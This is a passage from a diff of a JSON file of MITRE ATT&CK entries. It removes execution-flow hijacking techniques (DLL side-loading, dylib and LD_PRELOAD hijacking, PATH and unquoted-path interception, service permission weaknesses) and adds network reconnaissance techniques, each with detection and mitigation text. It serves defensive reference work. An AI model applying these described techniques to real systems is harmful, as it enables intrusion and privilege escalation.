-                "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1044",
-                        "name": "Restrict Library Loading",
-                        "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
-                        "url": "https://attack.mitre.org/mitigations/M1044"
-                    }
-                ]
-            },
-            {
-                "tid": "T1574.002",
-                "name": "Hijack Execution Flow: DLL Side-Loading",
-                "url": "https://attack.mitre.org/techniques/T1574/002",
-                "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)",
-                "detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
-                "mitigations": [
-                    {
-                        "mid": "M1013",
-                        "name": "Application Developer Guidance",
-                        "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
-                        "url": "https://attack.mitre.org/mitigations/M1013"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            },
-            {
-                "tid": "T1574.004",
-                "name": "Hijack Execution Flow: Dylib Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1574/004",
-                "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)",
-                "detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)",
-                "mitigations": [
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1574.005",
-                "name": "Hijack Execution Flow: Executable Installer File Permissions Weakness",
-                "url": "https://attack.mitre.org/techniques/T1574/005",
-                "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
-                "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1052",
-                        "name": "User Account Control",
-                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                        "url": "https://attack.mitre.org/mitigations/M1052"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1574.006",
-                "name": "Hijack Execution Flow: Dynamic Linker Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1574/006",
-                "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ",
-                "detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    }
-                ]
-            },
-            {
-                "tid": "T1574.007",
-                "name": "Hijack Execution Flow: Path Interception by PATH Environment Variable",
-                "url": "https://attack.mitre.org/techniques/T1574/007",
-                "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
-                "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "tid": "T1590.001",
+                "name": "Gather Victim Network Information: Domain Properties",
+                "url": "https://attack.mitre.org/techniques/T1590/001",
+                "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1574.008",
-                "name": "Hijack Execution Flow: Path Interception by Search Order Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1574/008",
-                "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
-                "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n",
+                "tid": "T1590.002",
+                "name": "Gather Victim Network Information: DNS",
+                "url": "https://attack.mitre.org/techniques/T1590/002",
+                "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1574.009",
-                "name": "Hijack Execution Flow: Path Interception by Unquoted Path",
-                "url": "https://attack.mitre.org/techniques/T1574/009",
-                "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
-                "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "tid": "T1590.003",
+                "name": "Gather Victim Network Information: Network Trust Dependencies",
+                "url": "https://attack.mitre.org/techniques/T1590/003",
+                "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1574.010",
-                "name": "Hijack Execution Flow: Services File Permissions Weakness",
-                "url": "https://attack.mitre.org/techniques/T1574/010",
-                "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
-                "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
+                "tid": "T1590.004",
+                "name": "Gather Victim Network Information: Network Topology",
+                "url": "https://attack.mitre.org/techniques/T1590/004",
+                "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1052",
-                        "name": "User Account Control",
-                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                        "url": "https://attack.mitre.org/mitigations/M1052"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1574.011",
-                "name": "Hijack Execution Flow: Services Registry Permissions Weakness",
-                "url": "https://attack.mitre.org/techniques/T1574/011",
-                "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)",
-                "detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
+                "tid": "T1590.005",
+                "name": "Gather Victim Network Information: IP Addresses",
+                "url": "https://attack.mitre.org/techniques/T1590/005",
+                "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1574.012",
-                "name": "Hijack Execution Flow: COR_PROFILER",
-                "url": "https://attack.mitre.org/techniques/T1574/012",
